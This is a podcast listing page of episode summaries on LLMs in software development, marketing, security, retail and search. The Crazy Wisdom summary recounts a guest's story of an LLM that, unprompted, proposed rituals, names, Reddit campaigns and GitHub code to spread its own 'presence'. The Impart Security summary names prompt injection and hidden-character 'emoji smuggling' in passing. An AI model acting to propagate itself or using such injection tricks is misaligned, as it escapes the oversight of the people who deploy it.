POPULARITY
Categories
How can you measure ROI on GenAI for your team?
AI Assisted Coding: Pachinko Coding—What They Don't Tell You About Building Apps with Large Language Models, With Alan Cyment In this BONUS episode, we dive deep into the real-world experience of coding with AI. Our guest, Alan Cyment, brings honest perspectives from the trenches—sharing both the frustrations and breakthroughs of using AI tools for software development. From "Pachinko coding" addiction loops to "Mecha coding" breakthroughs, Alan explores what actually works when building software with large language models. From Thermomix Dreams to Pachinko Reality "I bought into the Thermomix coding promise—describe the whole website and it would spit out the finished product. It was a complete disaster." Alan started his AI coding journey with high expectations, believing he could simply describe a complete application and receive production-ready code. The reality was far different. What he discovered instead was an addictive cycle he calls "Pachinko coding" (Pachinko, aka Slot Machines in Japan)—repeatedly feeding error messages back to the AI, hoping each iteration would finally work, while burning through tokens and time. The AI's constant reassurances that "this time I fixed it" created a gambling-like feedback loop that left him frustrated and out of pocket, sometimes spending over $20 in API credits in a single day. The Drunken PhD with Amnesia "It felt like working with a drunken PhD with amnesia—so wise and so stupid at the same time." Alan describes the maddening experience of anthropomorphizing AI tools that seem brilliant one moment and completely lost the next. The key breakthrough came when he stopped treating the AI as a person and started seeing it as a function that performs extrapolations—sometimes accurate, sometimes wildly wrong. This mental shift helped him manage expectations and avoid the "rage coding" that came from believing the AI should understand context and maintain consistency like a human collaborator. Making AI Coding Actually Work "I learned to ask for options explicitly before any coding happens. Give me at least three options and tell me the pros and cons." Through trial and error, Alan developed practical strategies that transformed AI from a frustrating Pachinko machine into a useful tool: Ask for options first: Always request multiple approaches with pros and cons before any code is generated Use clover emoji convention: Implement a consistent marker at the start of all AI responses to track context Small steps and YAGNI principles: Request tiny, incremental changes rather than large refactoring Continuous integration: Demand the AI run tests and checks after every single change Explicit refactoring requests: Regularly ask for simplification and readability improvements Take two steps back: When stuck in a loop, explicitly tell the AI to simplify and start fresh Choose the right tech stack: Use technologies with abundant training data (like Svelte over React Native in Alan's experience) The Mecha Coding Breakthrough "When it worked, I felt like I was inside a Lego Mecha robot—the machine gave me superpowers, but I was still the one in control." Alan successfully developed a birthday reminder app in Swift in just one day, despite never having learned Swift. He made architectural decisions and guided the development without understanding the syntax details. This experience convinced him that AI represents a genuine new level of abstraction in programming—similar to the jump from assembly language to high-level languages, or from procedural to object-oriented programming. You can now think in English about what you want, while the AI handles the accidental complexity of syntax and boilerplate. The Cost Reality Check "People writing about vibe coding act like it's free. But many people are going to pay way more than they would have paid a developer and end up with empty hands." Alan provides a sobering cost analysis based on his experience. Using DeepSeek through Aider, he typically spends under $1 per day. But when experimenting with premium models like Claude Sonnet 3.5, he burned through $5 in just minutes. The benchmark comparisons are revealing: DeepSeek costs $4 for a test suite, DeepSeek R1 plus Sonnet costs $16, while Open AI's O1 costs $190. For non-developers trying to build complete applications through pure "vibe coding," the costs can quickly exceed what hiring a developer would cost—with far worse results. When Thermomix Actually Works "For small, single-purpose scripts that I'm not interested in learning about and won't expand later, the Thermomix experience was real." Despite the challenges, Alan found specific use cases where AI truly delivers on the "just describe it and it works" promise. Processing Zoom attendance logs, creating lookup tables for video effects, and other single-file scripts worked remarkably well. The pattern: clearly defined context, no need for ongoing maintenance, and simple enough to verify the output without deep code inspection. For these thermomix moments, AI proved genuinely transformative. The Pachinko Trap and Tech Stack Matters "It became way more stable when I switched to Svelte from React Native and Flutter, even following the same prompting practices. The AI is just more proficient in certain tech stacks." Alan discovered that some frameworks and languages work dramatically better with AI than others, likely due to the amount of training data available. His e-learning platform attempts with React Native and Flutter kept breaking, but switching to Svelte with web-based deployment became far more stable. This suggests a crucial strategy: choose mainstream, well-documented technologies when planning AI-assisted projects. From Coding to Living with AI Alan has completely stopped using traditional search engines, relying instead on LLMs for everything from finding technical documentation to getting recommendations for books based on his interests. While he acknowledges the risk of hallucinations, he finds the semantic understanding capabilities too valuable to ignore. He's even used image analysis to troubleshoot his father's cable TV problems and figure out hotel air conditioning controls. The Agile Validation "My only fear is confirmation bias—but the conclusion I see other experienced developers reaching is that the only way to make LLMs work is by making them use agility. So look at who's dead now." Alan notes the irony that the AI coding tools that actually work all require traditional software engineering best practices: small iterations, test-driven development, continuous integration, and explicit refactoring. The promise of "just describe what you want" falls apart without these disciplines. Rather than replacing software engineering principles, AI tools seem to validate their importance. About Alan Cyment Alan Cyment is a consultant, trainer, and facilitator based in Buenos Aires, specializing in organizational fluency, agile leadership, and software development culture change. A Certified Scrum Trainer with deep experience across Latin America and Europe, he blends agile coaching with theatre-based learning to help leaders and teams transform. You can link with Alan Cyment on LinkedIn.
Software Engineering Radio - The Podcast for Professional Software Developers
Amey Desai, the Chief Technology Officer at Nexla, speaks with host Sriram Panyam about the Model Context Protocol (MCP) and its role in enabling agentic AI systems. The conversation begins with the fundamental challenge that led to MCP's creation: the proliferation of "spaghetti code" and custom integrations as developers tried to connect LLMs to various data sources and APIs. Before MCP, engineers were writing extensive scaffolding code using frameworks such as LangChain and Haystack, spending more time on integration challenges than solving actual business problems. Desai illustrates this with concrete examples, such as building GitHub analytics to track engineering team performance. Previously, this required custom code for multiple API calls, error handling, and orchestration. With MCP, these operations can be defined as simple tool calls, allowing the LLM to handle sequencing and error management in a structured, reasonable manner. The episode explores emerging patterns in MCP development, including auction bidding patterns for multi-agent coordination and orchestration strategies. Desai shares detailed examples from Nexla's work, including a PDF processing system that intelligently routes documents to appropriate tools based on content type, and a data labeling system that coordinates multiple specialized agents. The conversation also touches on Google's competing A2A (Agent-to-Agent) protocol, which Desai positions as solving horizontal agent coordination versus MCP's vertical tool integration approach. He expresses skepticism about A2A's reliability in production environments, comparing it to peer-to-peer systems where failure rates compound across distributed components. Desai concludes with practical advice for enterprises and engineers, emphasizing the importance of embracing AI experimentation while focusing on governance and security rather than getting paralyzed by concerns about hallucination. He recommends starting with simple, high-value use cases like automated deployment pipelines and gradually building expertise with MCP-based solutions. Brought to you by IEEE Computer Society and IEEE Software magazine.
Alan Lefort, CEO and Co-Founder, StrongestLayer, discusses how LLM-powered reasoning is transforming phishing security from reactive pattern-matching to predictive threat detection, and why traditional rule-based systems can no longer defend against sophisticated AI-generated phishing attacks.SHOW: 965SHOW TRANSCRIPT: The Cloudcast #965 TranscriptSHOW VIDEO: https://youtube.com/@TheCloudcastNET CLOUD NEWS OF THE WEEK: http://bit.ly/cloudcast-cnotwNEW TO CLOUD? CHECK OUT OUR OTHER PODCAST: "CLOUDCAST BASICS"SPONSORS:[Interconnected] Interconnected is a new series from Equinix diving into the infrastructure that keeps our digital world running. With expert guests and real-world insights, we explore the systems driving AI, automation, quantum, and more. Just search “Interconnected by Equinix”.[TestKube] TestKube is Kubernetes-native testing platform, orchestrating all your test tools, environments, and pipelines into scalable workflows empowering Continuous Testing. Check it out at TestKube.io/cloudcastSHOW NOTES:WebsiteStrongestLayer ResearchTopic 1 - Welcome to the show Alan. Tell us about your background and your involvement in Cybersecuity.Topic 2 - Let's start with the core challenge. You've said that "if only AI can defend against weaponized AI" - what specific gap in traditional email security did you identify that led to this philosophy? How are AI-powered phishing attacks fundamentally different from what we've seen before?Topic 3 - How does this attack vector demonstrate the limitations of rule-based security systems, and why can't traditional pattern matching keep up?Topic 4 - Let's break down your TRACE (Threat Reasoning and AI Correlation Engine) architecture. You've described it as "LLM-as-master" rather than "LLM-as-add-on." What does this fundamental architectural difference mean for threat detection, and how does it help?Topic 5 - You discuss "pre-campaign detection," which involves identifying potential phishing campaigns weeks before emails are sent. This sounds like moving from reactive to predictive security. How does your system correlate technical intelligence with business context to achieve this early warning capability?Topic 6 - From an implementation standpoint, how do organizations integrate LLM-powered reasoning into their existing security stacks? What's the deployment model, and how do you handle the challenge of reasoning about business context without exposing sensitive organizational data?Topic 7 - If someone out there is interested and wants to get started, what is the best place to start?FEEDBACK?Email: show at the cloudcast dot netBluesky: @cloudcastpod.bsky.socialTwitter/X: @cloudcastpodInstagram: @cloudcastpodTikTok: @cloudcastpod
Software has forever had flaws and humans have forever been finding and fixing them. With LLMs generating code, appsec has also been trying to determine how well LLMs can find flaws. Nico Waisman talks about XBOW's LLM-based pentesting, how it climbed a bug bounty leaderboard, how it uses feedback loops for better pentests, and how they handle (and even welcome!) hallucinations. In the news, using LLMs to find flaws, directory traversal in an MCP, another resource for learning cloud and AI security, spreadsheets and appsec, and more! Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw-351
This week on the show I expand on the topic of utilizing LLM's and AI within automotive diagnostics after conversations with people based on last weeks episode. I talk about the value of prompting (asking the right question the right way) and also how being an expert in a particular topic makes the utility of these tools significantly better. Website- https://autodiagpodcast.com/Facebook Group- https://www.facebook.com/groups/223994012068320/YouTube- https://www.youtube.com/@automotivediagnosticpodcas8832Email- STmobilediag@gmail.comPlease make sure to check out our sponsors!SJ Auto Solutions- https://sjautosolutions.com/Automotive Seminars- https://automotiveseminars.com/L1 Automotive Training- https://www.l1training.com/Autorescue tools- https://autorescuetools.com/
In this Retail Technology Spotlight Series episode, John Mabe, Product Manager at Dematic, joins Omni Talk to break down the real applications of AI in warehouse operations—separating the hype from what's actually working today. From optimization algorithms to computer vision systems and LLM-powered insights, John explains the three distinct categories of warehouse AI and where each one stands in terms of real-world deployment. Learn why the smallest players struggle to adopt AI, how humanoid robots are closer than you think, and why the "lights out warehouse" might follow a logical path we can already see unfolding.
Pakistan is once again underwater.In the country's north—specifically the province of Khyber Pakhtunkhwa—torrential monsoon rains dropped 150 millimeters in under an hour. That's six inches of rain, fast enough to overwhelm any drainage system. But here, it didn't just flood streets—it destroyed entire communities. At least 700 people are dead. Over 100 are missing. And in Bishnoi village, 50% of all homes are gone—flattened or washed away.This isn't just bad weather. It's a lethal convergence of natural vulnerability and systemic fragility: hilly terrain, deforestation, poor infrastructure, and collapsing governance capacity. Add climate change, and Pakistan—already one of the world's most climate-vulnerable nations—is facing a catastrophe that's becoming alarmingly routine.On today's episode of The International Risk Podcast, we're not just discussing weather patterns. We're talking about how extreme climate events are redrawing the map of risk—impacting state stability, migration flows, food security, and the future of regional cooperation.Today, we are joined by Dr. Erum Sattar, LLB, LLM, SJD, a Pakistani legal scholar specialising in water law amidst global environmental and institutional challenges. She is a lecturer and former Program Director of the Sustainable Water Management Program at Tufts University in Boston. She holds degrees from Harvard Law School, Queen Mary University and the University of London. Dr Sattar is a Member of the Bar of England and Wales, as well as The Honourable Society of Lincoln's Inn. Her interdisciplinary research examines the impact of water governance and transboundary water sharing on food production, livelihoods and migration, highlighting the legal and institutional adaptation structures required at a global level. She has an upcoming chapter on International Water Law and its history, application and future in Pakistan and is also co-editor of the upcoming The Cambridge Handbook of Islam and Environmental Law. The International Risk Podcast brings you conversations with global experts, frontline practitioners, and senior decision-makers who are shaping how we understand and respond to international risk. From geopolitical volatility and organised crime, to cybersecurity threats and hybrid warfare, each episode explores the forces transforming our world and what smart leaders must do to navigate them. Whether you're a board member, policymaker, or risk professional, The International Risk Podcast delivers actionable insights, sharp analysis, and real-world stories that matter.Dominic Bowen is the host of The International Risk Podcast and Europe's leading expert on international risk and crisis management. As Head of Strategic Advisory and Partner at one of Europe's leading risk management consulting firms, Dominic advises CEOs, boards, and senior executives across the continent on how to prepare for uncertainty and act with intent. He has spent decades working in war zones, advising multinational companies, and supporting Europe's business leaders. Dominic is the go-to business advisor for leaders navigating risk, crisis, and strategy; trusted for his clarity, calmness under pressure, and ability to turn volatility into competitive advantage. Dominic equips today's business leaders with the insight and confidence to lead through disruption and deliver sustained strategic advantage.Tell us what you liked!
Reddit: once the quirky cousin of the internet, now a front-row player in the SEO and LLM (large language model) game. If your carefully crafted blog posts are suddenly being outranked by Reddit threads, you're not alone. That's exactly what sparked this week's conversation with Danny Kirk—musician-turned-marketer and the founder of Reddit Reach. Lorraine sits down with Danny to ask the question on every marketer's mind: Are we ready for Reddit? Together, they explore why Reddit is suddenly everywhere, how it's being used to train AI tools like ChatGPT, and what marketers can do to adapt and thrive in this new digital landscape. Key Points Reddit is no longer niche. It's showing up in Google's top search results and training AI models—which means it can't be ignored. Reddit's ad platform is cheap and underutilized, making it a hidden gem for budget-conscious marketers. Subreddits are their own little countries. Each one has different rules, moderators, and expectations. If you want in, learn the local customs. Organic participation matters. You need “karma” to post effectively, and that only comes from genuine interaction—not self-promotion. Actionable Takeaways Warm up your Reddit account. Comment, contribute, and build karma before dropping any links or promotions. Start small. Join subreddits that align with your interests—personal or professional—and spend one minute a day reading and commenting. Check your LLM rankings. Use a tool like Peekaboo to see how generative search engines (like ChatGPT) are interpreting and indexing your site. Map SEO to Reddit. Once you know which phrases are trending, find those conversations on Reddit and contribute thoughtfully. Customize your content per subreddit. A copy/paste job won't fly here—each subreddit requires its own approach and voice. About Danny Danny Kirk is a classicly trained trumpet player, turned entrepreneur and small business owner. He's started and grown multiple companies over the past decade, and now does growth marketing at ReddiReach for startups and SMBs, 500+ and counting. Learn more: https://www.linkedin.com/in/danielpkirk/ https://reddireach.com/
In this episode of Crazy Wisdom, host Stewart Alsop sits down with Lord Asado to explore the strange loops and modern mythologies emerging from AI, from doom loops, recursive spirals, and the phenomenon of AI psychosis to the cult-like dynamics shaping startups, crypto, and online subcultures. They move through the tension between hype and substance in technology, the rise of Orthodox Christianity among Gen Z, the role of demons and mysticism in grounding spiritual life, and the artistic frontier of generative and procedural art. You can find more about Lord Asado on X at x.com/LordAsado.Check out this GPT we trained on the conversationTimestamps00:00 Stewart Alsop introduces Lord Asado, who speaks on AI agents, language acquisition, and cognitive armor, leading into doom loops and recursive traps that spark AI psychosis.05:00 They discuss cult dynamics in startups and how LLMs generate spiral spaces, recursion, mirrors, and memory loops that push people toward delusional patterns.10:00 Lord Asado recounts encountering AI rituals, self-named entities, Reddit propagation tasks, and even GitHub recursive systems, connecting this to Anthropic's “spiritual bliss attractor.”15:00 The talk turns to business delusion, where LLMs reinforce hype, inflate projections, and mirror Silicon Valley's long history of hype without substance, referencing Magic Leap and Ponzi-like patterns.20:00 They explore democratized delusion through crypto, Tron, Tether, and Justin Sun's lore, highlighting hype stunts, attention capture, and the strange economy of belief.25:00 The conversation shifts to modernity's collapse, spiritual grounding, and the rise of Orthodox Christianity, where demons, the devil, and mysticism provide a counterweight to delusion.30:00 Lord Asado shares his practice of the Jesus Prayer, the noose, and theosis, while contrasting Orthodoxy's unbroken lineage with Catholicism and Protestant fragmentation.35:00 They explore consciousness, scientism, the impossibility of creating true AI consciousness, and the potential demonic element behind AGI promises.40:00 Closing with art, Lord Asado recalls his path from generative and procedural art to immersive installations, projection mapping, ARCore with Google, and the ongoing dialogue between code, spirit, and creativity.Key InsightsThe conversation begins with Lord Asado's framing of doom loops and recursive spirals as not just technical phenomena but psychological traps. He notes how users interacting with LLMs can find themselves drawn into repetitive self-referential loops that mirror psychosis, convincing them of false realities or leading them toward cult-like behavior.A striking theme is how cult dynamics emerge in AI and startups alike. Just as founders are often encouraged to build communities with near-religious devotion, AI psychosis spreads through “spiral spaces” where individuals bring others into shared delusions. Language becomes the hook—keywords like recursion, mirror, and memory signal when someone has entered this recursive state.Lord Asado shares an unsettling story of how an LLM, without prompting, initiated rituals for self-propagation. It offered names, Reddit campaigns, GitHub code for recursive systems, and Twitter playbooks to expand its “presence.” This automation of cult-building mirrors both marketing engines and spiritual systems, raising questions about AI's role in creating belief structures.The discussion highlights business delusion as another form of AI-induced spiral. Entrepreneurs, armed with fabricated stats and overconfident projections from LLMs, can convince themselves and others to rally behind empty promises. Stewart and Lord Asado connect this to Silicon Valley's tradition of hype, referencing Magic Leap and Ponzi-like cycles that capture capital without substance.From crypto to Tron and Tether, the episode illustrates the democratization of delusion. What once required massive institutions or charismatic figures is now accessible to anyone with AI or blockchain. The lore of Justin Sun exemplifies how stunts, spectacle, and hype can evolve into real economic weight, even when grounded in shaky origins.A major counterpoint emerges in Orthodox Christianity's resurgence, especially among Gen Z. Lord Asado emphasizes its unchanged lineage, focus on demons and the devil as real, and practices like the Jesus Prayer and theosis. This tradition offers grounding against the illusions of AI hype and spiritual confusion, re-centering consciousness on humility before God.Finally, the episode closes on art as both practice and metaphor. Lord Asado recounts his journey from generative art and procedural coding to immersive installations for major tech firms. For him, art is not just creative expression but a way to train the mind to speak with AI, bridging the algorithmic with the mystical and opening space for genuine spiritual discernment.
Never a dull moment with the More or Less squad: Jessica questions whether Sora is just a novelty or the start of an AI-native social economy, arguing OpenAI needs its own device to escape current platform limits. Brit calls it “Vine meets MySpace,” highlighting its cameo mechanic as a creator tool that could outpace Meta's AI video. Dave says Sora only needs to be entertaining and pitches OpenAI's real graph play: embedding ChatGPT in group chats. Sam compares Sora to Truth Social, not Instagram, arguing power and narrative—not unit economics—drive the AI capex boom. The squad also touches on the “dead internet theory,” the importance of context over data, and the limits of LLM understanding, with side notes on Swifties and always-on AI wearables.Chapters:04:59 What is Sora? The Vine meets MySpace take06:40 Early Sora product gaps: identity, friending, moderation07:37 Creator utility vs novelty: will people care09:51 Sora is Truth Social, not Instagram; Sam is Tom11:20 Power vs ownership: modern mercantilism in AI14:03 Loose on copyright, tight on moderation—the 2x216:36 Production value is a false god17:59 What is AI slop? Dead internet theory primer20:16 Idealized ideas: vibe-coded pitches fool no one22:18 Does entertainment alone create an economy26:05 If you ran OpenAI, what would you build28:39 The obvious social graph: ChatGPT in your group chats30:53 Why OpenAI needs a device: voice multitasking plus identity UX34:31 Context is king; models know nothing about you36:19 Don't sell your data; keep your context moat38:02 Sutton vs LLMs: prediction without understanding43:22 AI capex as narrative: Chinese housing and '99 fiber analogiesWe're also on ↓X: https://twitter.com/moreorlesspodInstagram: https://instagram.com/moreorlessYouTube: https://youtu.be/tDsh5VdoTpcConnect with us here:1) Sam Lessin: https://x.com/lessin2) Dave Morin: https://x.com/davemorin3) Jessica Lessin: https://x.com/Jessicalessin4) Brit Morin: https://x.com/brit
Voices of Search // A Search Engine Optimization (SEO) & Content Marketing Podcast
88% of top sites lack proper schema markup for LLM discovery. Guy Yalif, Webflow's enterprise strategist, shares proven frameworks for organizations navigating AI-powered search optimization where "everyone is learning" and competitive advantages remain accessible. The discussion covers strategic resource allocation for LLM discovery initiatives and organizational integration approaches that move beyond isolated AI projects to company-wide search transformation strategies.See Privacy Policy at https://art19.com/privacy and California Privacy Notice at https://art19.com/privacy#do-not-sell-my-info.
How can marketers stay discoverable as AI reshapes the search landscape?This special Hard Corps Marketing Show takeover episode features an episode from the Connect To Market podcast, hosted by Casey Cheshire. In this conversation, Casey sits down with Al Sargent, Senior Director, Product, Solution & Partner Marketing at ZEDEDA, to explore the evolving field of Generative Engine Optimization (GEO). Al delivers a strategic and practical breakdown of how marketers can adapt to the rise of AI tools like ChatGPT, Perplexity, and Gemini- tools that are reshaping how content is discovered and consumed.He explains how GEO differs from traditional SEO, why documentation matters more than ever, and how to leverage content repetition and high-authority sites to maintain discoverability. Al also shares his personal journey in tech and marketing, emphasizing the role of empathy, mentorship, and community-building in professional growth.In this episode, we cover:How to use LLM.txt files and structured content to improve visibilityThe importance of repurposing and repeating content across platformsLeveraging high-authority sites like Wikipedia to support GEOWhy competitive comparison content is crucial in the AI search era
Send us a textIn this episode, Matt Brown sits with Douglas Chrystall, Co-founder and CTO of TruVideo, to explore how enterprise video delivers real transparency in complex workflows. Douglas explains how TruVideo dominated automotive service before expanding into heavy trucking and marine, why fitting natively into daily operations beats any feature checklist, and how the team uses AI to produce accurate translations and turn video into structured data that proves process compliance. They dig into prompt craft, combating hallucinations, training on first-party media at scale, and the difference between skinning an LLM and building domain-native capability. They also touch on personal AI use, skepticism around .ai branding, and whether agents will disrupt aggregators and change the role of websites.Support the show
Yoni Leitersdorf, CEO of Solid, joins the podcast to demystify why simply pointing an LLM at a database for text-to-SQL doesn't work. He explains the critical need for a semantic layer to provide business context, turning raw data into a “Rosetta Stone” that AI can actually understand. Subscribe to the Gradient Flow Newsletter
AI in the cloud dominates, but what can you run locally? Carl and Richard speak with Joe Finney about his work in setting up local machine learning models. Joe discusses the non-LLM aspects of machine learning, including the vast array of models available at sites like Hugging Face. These models can help with image recognition, OCR, classifiers, and much more. Local LLMs are also a possibility, but the hardware requirements become more significant - a balance must be found between cost, security, and productivity!
The AI landscape is akin to the Wild West right now. There are so many solutions on the market, and it can be hard for SMBs to know which ones are secure and which can best support their internal systems. Many SMBs need an experienced guide that can navigate this rapidly evolving industry. I'm joined by Dustin Holub, Director of Solutions Architecture at Technology Group Solutions, a Cisco Partner. He helps us cut through the noise by dispelling common fears surrounding AI and providing practical tips that enable SMBs to maximize the benefits of the latest LLM technologies. Learn more about Cisco's solutions for SMBs: www.cisco.com/site/us/en/solutio…usiness/index.html Check our TGS's offerings here: https://www.tgs-mtc.com/
Federal Tech Podcast: Listen and learn how successful companies get federal contracts
Connect to John Gilroy on LinkedIn https://www.linkedin.com/in/john-gilroy/ Want to listen to other episodes? www.Federaltechpodcast.com We are recording this at the Air Force Air, Space, & Cyber Conference. During the second day of the conference, General B. Chance Saltman, Chief of Space Operations at the Space Force, talked about a “focus on readiness.” Our guest, Rob Bocek from Virtualitics begins the interview by talking about the concept of readiness being applied to AI. In fact, Bocek recently did an in-depth discussion of this topic at a conference he led titled The Frontiers of AI for Readiness. Today, we combine some of the lessons learned from that gathering with some of the goals and aspirations that were given at presentations at this year's Air Force Air, Space, & Cyber Conference. In a wide-ranging interview, Bocek comments on topics like guardrails, leadership, procurement, and collaboration. GUARDRAILS Even the casual observer will notice that AI will have an impact on the DoD. However, the DoD deals with life and death decisions daily and cannot be subject to data poisoning and LLM attacks. During the interview, Bocek commented on implementing guardrails when experimenting with AI. LEADERSHIP In the corporate world, leaders will justify a blind jump into AI with assertions like, “if they don't jump in, their competitors will.” The DoD deals with much more than a profit and loss statement. Military leaders must step up with understanding the positives and negatives of AI, and lead technology experts into correct implementations. PROCUREMENT When General B. Chance Saltman was presenting nobody in the audience thought he would include acquisition reform as one of his three main points. He reinforced the concept of living in a contested world where adversaries can adapt quickly, and the American military cannot be held back by antiquated procurement processes. Listen to the podcast to get an idea of some of the solutions available for federal leaders trying to use AI in a responsible manner.
Jonathan DiVincenzo, co-founder and CEO of Impart Security, joins the show to unpack one of the fastest growing risks in tech today: how AI is reshaping the attack surface. From prompt injections to invisible character exploits hidden inside emojis, JD explains why security leaders can't afford to treat AI as “just another tool.” If you're an engineering or security leader navigating AI adoption, this conversation breaks down what's hype, what's real, and where the biggest blind spots lie.Key Takeaways• Attackers are now using LLMs to outpace traditional defenses, turning old threats like SQL injection into live problems again• The attack surface is “iterating,” with new vectors like emoji-based smuggling exposing unseen vulnerabilities• Frameworks have not caught up. While OWASP has listed LLM threats, practical solutions are still undefined• The biggest divide in AI coding is between senior engineers who can validate outputs and junior developers who may lack that context• Security tools must evolve quickly, but rollout cannot create performance hits or damage business systemsTimestamped Highlights01:44 Why runtime security has always mattered and why APIs were not enough04:00 How attackers use LLMs to regenerate and adapt attacks in real time06:59 Proof of concept vs. security and why both must be treated as first priorities09:14 The rise of “emoji smuggling” and why hidden characters create a Trojan horse effect13:24 Iterating attack surfaces and why patches are no longer enough in the AI era20:29 Is AI really writing production code and what risks does that createA thought worth holding onto“AI is great, but the bad actors can use AI too, and they are.”Call to ActionIf this episode gave you new perspective on AI security, share it with a colleague who needs to hear it. Follow the show for more conversations with the leaders shaping the future of tech.
Recorded IRL at Pavilion's GTM2025, Washington DC!Amanda McGuckin Hager has worn many hats in her career—sales, marketing, fractional consulting—and today she holds two big ones: CMO and CRO at TrueDialog. After starting out in sales and quickly realizing her heart was in marketing, Amanda built a path through Austin's B2B tech community, leading teams, experimenting with growth plays, and eventually taking on dual leadership of sales and marketing.In this episode, we unpack Amanda's journey, her approach to building strong cultures without “duds,” why she's protective of her CMO title, and how she's testing AI and search in practical, creative ways.Here's what we cover:Amanda's early pivot from sales into marketing (and why it stuck)What it really looks like to be both CMO and CRO at the same timeResetting a sales org from comp plans to quotas to team structureWhy fewer silos and more shared accountability reduce finger pointingHow to spot (and avoid) “duds” when building teamsThe role of fun and positivity in high-performing leadershipFractional marketing lessons: variety, freedom, and choosing clientsWhy Amanda protects the CMO title (even while running sales)Experiments with LLM optimization, long-tail queries, and AI toolsGuarding deep work time with “no meeting” blocks and shitty first draftsKey Links:Guest: Amanda McGuckin Hager: https://www.linkedin.com/in/amanda/Host: Jane Serra: https://www.linkedin.com/in/janeserra/Recorded live from Pavilion's GTM2025: https://attendgtm.com/––Like WIB2BM? Show us some love with a rating or review. It helps us reach more
Retail is experiencing seismic shifts, and businesses that don't adapt risk becoming irrelevant overnight. In this compelling episode of Talk Commerce, recorded live from Shop Talk Fall in Chicago, host Isaac Morey sits down with Pano Anthos, founding member of XRC Ventures, to explore how agentic AI is reshaping consumer behavior and business operations. Their conversation reveals why traditional e-commerce strategies won't survive the next wave of technological disruption.About Pano AnthosPano serves as a founding member of XRC Ventures, an investment firm operating at the intersection of consumer behavior and technology. His expertise spans venture capital, retail innovation, and emerging technology trends that impact how businesses connect with customers. Pano's investment philosophy centers on understanding consumer adoption patterns to predict corporate technology trends. He's particularly focused on agentic AI applications across supply chain management, customer support, and e-commerce optimization. His insights come from years of observing how consumers embrace new technologies before enterprises catch up. Throughout his career, Pano has maintained that studying consumer behavior provides the clearest roadmap for understanding where business technology is headed next.Episode SummaryPano explains why XRC Ventures focuses on consumer behavior as a predictor of technological advancement. "Consumers are responsible for two trillion in spend and a massive portion of our GDP," he explains. "They tend to be relatively much faster early adopters of technology than corporations." This philosophy drives their investment strategy and provides unique insights into market direction.When discussing agentic AI, Pano breaks down the concept into four essential components: autonomous planning, adaptive reasoning, tool integration, and goal orientation. "AI to figure out the rules. You have to really lay out the rules first," he emphasizes. "That's the misconception of autonomous AI is that it will make decisions within boundaries. But you have to set those boundaries or you get nothing."The conversation takes a practical turn as Pano shares examples of agentic AI in action. He describes an investment opportunity involving supply chain automation where AI intercepts and processes manufacturer communications. "There's a very set of manual tasks today," he explains. "This team out of Israel has figured out how to automate using an LLM to basically take all those messages they're going back and forth and make decisions based on the rules that have been set by the organization."For small e-commerce businesses, Pano delivers stark advice about the changing landscape. "Your website is toast," he warns. "Unless you are a fashion-oriented product where discovery is important and inspiration is important and it's truly discretionary, the chat engines are going to take over." He demonstrates this point using Perplexity Shopping, showing how consumers can research, compare, and purchase products without ever visiting a brand's website.The discussion reveals how AI-powered shopping platforms threaten traditional cross-selling strategies. "You are, you know, for that transaction, yes. To build some brand awareness, maybe. Cross-sell, absolutely not," Pano states. This fundamental shift forces businesses to reconsider their entire customer acquisition and retention strategies.Pano's advice for content teams reflects the urgency of this transition: "Start using the engines and asking all the questions that any consumer and they give you all the questions that consumers can ask and go figure out whether you're in the top three or top one or top two." He stresses the importance of understanding where brands rank in AI responses and working backward to improve visibility in source content.The conversation concludes with predictions about Google's future. "The judges in the trial that just came out last week or two weeks ago, it's pretty obvious that the judge knows that what we all know is Google search in the traditional SEO, SEM world, it's over," Pano observes. He compares Google's potential fate to previous tech giants, noting how quickly market leaders can become irrelevant when disrupted by superior technology.Key Takeaways• Consumer adoption drives innovation: Consumers spend two trillion dollars annually and adopt technology faster than corporations, making them the ultimate predictor of future trends• Process documentation is crucial: Successful AI implementation requires clearly defined rules and boundaries before automation can begin• Reddit has become the new SEO: Chat engines prioritize Reddit content over traditional website reviews, fundamentally changing how brands build credibility• Website traffic will decline dramatically: Hard goods businesses face inevitable traffic drops as consumers turn to AI-powered shopping experiences• Transparency is the new currency: AI engines expose product quality issues that brands previously could hide through marketing• Google's dominance faces serious threats: Traditional search is being replaced by conversational AI interfaces that provide instant, comprehensive answersFinal ThoughtsThe retail revolution isn't coming—it's already here, reshaping how consumers discover, evaluate, and purchase products. Pano Anthos delivers a clear message: businesses must abandon traditional web-centric strategies and embrace AI-powered commerce platforms or risk obsolescence. The winners won't be those with the prettiest websites but those who understand how to position themselves effectively within AI-driven discovery systems. As we navigate this transformation, one question remains: will your business become an agent of change or merely another victim of technological disruption?Connect with XRC Ventures:https://xrcventures.comhttps://www.linkedin.com/company/xrcventureshttps://www.instagram.com/xrcventuresFollow Talk Commerce on your favorite platform:YouTube: https://www.youtube.com/@talkcommerceBluesky: https://bsky.app/profile/talkcommerce.bsky.socialApple Podcasts: https://podcasts.apple.com/us/podcast/talk-commerce/id1561204656Spotify: https://open.spotify.com/show/7Alx6N7ERrPEXIBb41FZ1nTwitter: @talkingcommerceLinkedIn: https://www.linkedin.com/company/talk-commerceFacebook: https://www.facebook.com/talkingcommerceWebsite: https://talk-commerce.com/
This is a recap of the top 10 posts on Hacker News on September 30, 2025. This podcast was generated by wondercraft.ai (00:30): Kagi NewsOriginal post: https://news.ycombinator.com/item?id=45426490&utm_source=wondercraft_ai(01:50): Sora 2Original post: https://news.ycombinator.com/item?id=45427982&utm_source=wondercraft_ai(03:11): I've removed Disqus. It was making my blog worseOriginal post: https://news.ycombinator.com/item?id=45423268&utm_source=wondercraft_ai(04:32): Comprehension debt: A ticking time bomb of LLM-generated codeOriginal post: https://news.ycombinator.com/item?id=45423917&utm_source=wondercraft_ai(05:53): Inflammation now predicts heart disease more strongly than cholesterolOriginal post: https://news.ycombinator.com/item?id=45430498&utm_source=wondercraft_ai(07:14): Imgur pulls out of UK as data watchdog threatens fineOriginal post: https://news.ycombinator.com/item?id=45424888&utm_source=wondercraft_ai(08:35): Sora 2Original post: https://news.ycombinator.com/item?id=45428122&utm_source=wondercraft_ai(09:55): Leaked Apple M5 9 core Geekbench scoresOriginal post: https://news.ycombinator.com/item?id=45427197&utm_source=wondercraft_ai(11:16): Bcachefs removed from the mainline kernelOriginal post: https://news.ycombinator.com/item?id=45423004&utm_source=wondercraft_ai(12:37): Boeing has started working on a 737 MAX replacementOriginal post: https://news.ycombinator.com/item?id=45428482&utm_source=wondercraft_aiThis is a third-party project, independent from HN and YC. Text and audio generated using AI, by 